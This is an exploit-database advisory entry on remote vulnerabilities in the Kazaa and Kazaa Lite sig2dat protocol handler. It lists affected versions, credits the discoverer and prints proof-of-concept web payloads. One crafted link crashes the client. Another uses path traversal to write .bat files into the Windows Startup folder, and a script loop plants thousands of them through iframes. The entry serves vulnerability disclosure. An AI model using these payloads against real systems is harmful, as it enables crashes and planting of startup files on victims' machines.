exploits , vulnerabilities , articles , Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities

Title	Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
Published	2005-01-17-12:00AM
Updated	2005-01-18-11:53PM
Class	Unknown
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	"Rafel Ivgi, The-Insider" <theinsider@012.net.il> is credited with discovery of this issue.
Vulnerable	KaZaA Lite KaZaA Lite 2.0.2 KaZaA Lite KaZaA Lite 2.0 KaZaA Lite KaZaA Lite 1.7.2 KaZaA KaZaA Media Desktop 3.0 KaZaA KaZaA Media Desktop 2.6.4 KaZaA KaZaA Media Desktop 2.0.2 KaZaA KaZaA Media Desktop 2.0
Not Vulnerable
Code	No exploit is required to leverage these issues. The following proof of concepts have been provided: To crash the affected application: <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A> To create arbitrary files: <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A> <script> var i for (i=1;i<10000;i++) { mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All Users /Start Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB% 7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>"; document.write(mylocation); } </script>
TXT